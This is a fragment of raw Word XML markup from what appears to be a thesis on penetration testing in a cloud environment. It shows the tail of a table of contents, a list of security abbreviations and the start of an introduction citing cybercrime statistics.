        <w:p w14:paraId="025A54B6" w14:textId="6562F324" w:rsidR="009E02D2" w:rsidRPr="00D77DFE" w:rsidRDefault="009E02D2">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8493"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="majorBidi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc223521147" w:history="1">
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>6.10 Key Strengths and Weaknesses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_Toc223521147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53</w:t>
            </w:r>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5E7077D2" w14:textId="1F9D0630" w:rsidR="009E02D2" w:rsidRPr="00D77DFE" w:rsidRDefault="009E02D2">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8493"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="majorBidi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc223521148" w:history="1">
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>6.11 Introduction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_Toc223521148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54</w:t>
            </w:r>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1BB1ABDB" w14:textId="1E781280" w:rsidR="009E02D2" w:rsidRPr="00D77DFE" w:rsidRDefault="009E02D2">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8493"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="majorBidi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc223521149" w:history="1">
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>6.12 Objective</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_Toc223521149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54</w:t>
            </w:r>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0A1A9EA5" w14:textId="3577510C" w:rsidR="009E02D2" w:rsidRPr="00D77DFE" w:rsidRDefault="009E02D2">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8493"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="majorBidi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc223521150" w:history="1">
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>6.13 Scope</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_Toc223521150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54</w:t>
            </w:r>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3A44C841" w14:textId="1B2D6CB9" w:rsidR="009E02D2" w:rsidRPr="00D77DFE" w:rsidRDefault="009E02D2">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8493"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="majorBidi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc223521151" w:history="1">
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>6.14 Summary</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_Toc223521151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55</w:t>
            </w:r>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="7BC334CF" w14:textId="6B91DB43" w:rsidR="009E02D2" w:rsidRPr="00D77DFE" w:rsidRDefault="009E02D2">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8493"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="majorBidi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc223521152" w:history="1">
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>6.15. Technical Findings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_Toc223521152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56</w:t>
            </w:r>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0ACDE92E" w14:textId="652AD285" w:rsidR="009E02D2" w:rsidRPr="00D77DFE" w:rsidRDefault="009E02D2" w:rsidP="007617FB">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8493"/>
            </w:tabs>
            <w:ind w:left="0"/>
            <w:rPr>
              <w:rFonts w:asciiTheme="majorBidi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc223521153" w:history="1">
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
                <w:noProof/>
                <w:lang w:val="en-GB"/>
              </w:rPr>
              <w:t xml:space="preserve">7. </w:t>
            </w:r>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
                <w:noProof/>
              </w:rPr>
              <w:t>SUMMARY AND FINAL CONCLUSION</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_Toc223521153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74</w:t>
            </w:r>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1877467B" w14:textId="103CD8B6" w:rsidR="009E02D2" w:rsidRPr="00D77DFE" w:rsidRDefault="009E02D2" w:rsidP="007617FB">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8493"/>
            </w:tabs>
            <w:ind w:left="0"/>
            <w:rPr>
              <w:rFonts w:asciiTheme="majorBidi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc223521154" w:history="1">
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
                <w:noProof/>
              </w:rPr>
              <w:t>References</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_Toc223521154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75</w:t>
            </w:r>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="32D79C13" w14:textId="3BD0FAE6" w:rsidR="009E02D2" w:rsidRPr="00D77DFE" w:rsidRDefault="009E02D2">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8493"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="majorBidi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc223521155" w:history="1">
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>APPENDIX A</w:t>
            </w:r>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc223521155 \h </w:instrText>
            </w:r>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>79</w:t>
            </w:r>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2BA9D8A3" w14:textId="5B361DEC" w:rsidR="009E02D2" w:rsidRPr="00D77DFE" w:rsidRDefault="009E02D2">
          <w:pPr>
            <w:rPr>
              <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
            </w:rPr>
          </w:pPr>
          <w:r w:rsidRPr="00D77DFE">
            <w:rPr>
              <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
              <w:b/>
              <w:bCs/>
              <w:noProof/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:p>
      </w:sdtContent>
    </w:sdt>
    <w:p w14:paraId="7C394D8D" w14:textId="77777777" w:rsidR="009E02D2" w:rsidRDefault="009E02D2" w:rsidP="006551D6">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:i/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="3" w:name="_Toc223521073"/>
    </w:p>
    <w:p w14:paraId="1A2CEB83" w14:textId="77777777" w:rsidR="000C5658" w:rsidRDefault="000C5658" w:rsidP="000C5658"/>
    <w:p w14:paraId="251ACCC8" w14:textId="77777777" w:rsidR="000C5658" w:rsidRPr="000C5658" w:rsidRDefault="000C5658" w:rsidP="000C5658"/>
    <w:p w14:paraId="2AECEE32" w14:textId="05BE9A7C" w:rsidR="006551D6" w:rsidRPr="00D77DFE" w:rsidRDefault="006551D6" w:rsidP="006551D6">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:i/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>List of Abbreviations</w:t>
      </w:r>
      <w:bookmarkEnd w:id="3"/>
    </w:p>
    <w:p w14:paraId="5E7AB98C"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AJP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Apache JServ Protocol</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">AWS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Amazon Web Services</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="252D1CD8"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CIDR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Classless Inter-Domain Routing</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">CVE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Common Vulnerabilities and Exposures</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">CVSS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Common Vulnerability Scoring System</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EB858B1"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DDOS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Distributed Denial of Service</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">DNS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Domain Name System</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63F884D9" w14:textId="501EF954" w:rsidR="006551D6" w:rsidRPr="00D77DFE" w:rsidRDefault="006551D6" w:rsidP="00744850">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">EC2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Elastic Compute Cloud</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">FTP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File Transfer Protocol</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="500D59B7"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HTTP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Hypertext Transfer Protocol</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B379600"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IaaS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Infrastructure as a Service</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">IDOR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Insecure Direct Object Reference</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">IGW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Internet Gateway</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E8253A5"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LFI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Local File Inclusion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38CFAC05"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NACL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Network Access Control List</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">NAT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Network Address Translation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="120715CF"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OWASP </w:t>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Open Worldwide Application Security Project</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05466991" w14:textId="3A0CE563" w:rsidR="006551D6" w:rsidRPr="00D77DFE" w:rsidRDefault="006551D6" w:rsidP="00690249">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">RCE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Remote Code Execution</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">SSH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Secure Shell</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">SSRF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Server Side Request Forgery</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">SSTI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Server Side Template Injection</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">SUID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Set User ID</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="794C8849"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VLAN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Virtual Local Area Network</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">VPC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Virtual Private Cloud</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08154399"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WAR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Web Application Archive</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32CEE76D" w14:textId="77777777" w:rsidR="006551D6" w:rsidRPr="00D77DFE" w:rsidRDefault="006551D6" w:rsidP="006551D6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">XSS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t xml:space="preserve"> Cross Site Scripting</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="2"/>
    <w:p w14:paraId="0C9ECAF2" w14:textId="4E2D6ACD" w:rsidR="006551D6" w:rsidRPr="00D77DFE" w:rsidRDefault="006551D6" w:rsidP="00BE1C17">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:i/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3746699F" w14:textId="77777777" w:rsidR="00690249" w:rsidRDefault="00690249">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="71ABC4E3" w14:textId="77777777" w:rsidR="000C5658" w:rsidRDefault="000C5658">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3E810B2E" w14:textId="77777777" w:rsidR="000C5658" w:rsidRPr="00D77DFE" w:rsidRDefault="000C5658">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="33315CF9" w14:textId="77777777" w:rsidR="00EC5D87" w:rsidRDefault="00EC5D87" w:rsidP="009E5B3F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="03704C69" w14:textId="77777777" w:rsidR="000C5658" w:rsidRDefault="000C5658" w:rsidP="009E5B3F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7EA7887F" w14:textId="77777777" w:rsidR="000C5658" w:rsidRPr="00D77DFE" w:rsidRDefault="000C5658" w:rsidP="009E5B3F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="54244D0E" w14:textId="77777777" w:rsidR="000C5658" w:rsidRPr="00851710" w:rsidRDefault="000C5658" w:rsidP="00851710">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="4" w:name="_Toc223521074"/>
      <w:r w:rsidRPr="00851710">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Introduction</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FACF512" w14:textId="77777777" w:rsidR="000C5658" w:rsidRPr="000C5658" w:rsidRDefault="000C5658" w:rsidP="00851710">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000C5658">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>The rapid digitalization of modern industries has made cybersecurity one of the most critical challenges of our era. Organizations across all sectors increasingly rely on cloud-based infrastructure, web applications, and interconnected networks, creating an expanding attack surface for malicious actors. In the first half of 2025, over 1,700 confirmed data breaches were recorded, with the global cost of cybercrime estimated at $10.5 trillion annually. These figures highlight the urgent need for proactive security measures.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="794264FD" w14:textId="217C8D96" w:rsidR="000C5658" w:rsidRPr="000C5658" w:rsidRDefault="000C5658" w:rsidP="00851710">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000C5658">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>This thesis addresses the topic of penetration testing within a cloud-based environment, with particular focus on web application and network infrastructure vulnerabilities. The subject was chosen due to the growing prevalence of cyberattacks targeting misconfigured cloud environments and vulnerable web applications, as well as the increasing adoption of penetration testing as a standard security practice</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="000C5658">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve"> currently used by 94% of organizations as part of their security programs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0329399F" w14:textId="77777777" w:rsidR="000C5658" w:rsidRPr="000C5658" w:rsidRDefault="000C5658" w:rsidP="00851710">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
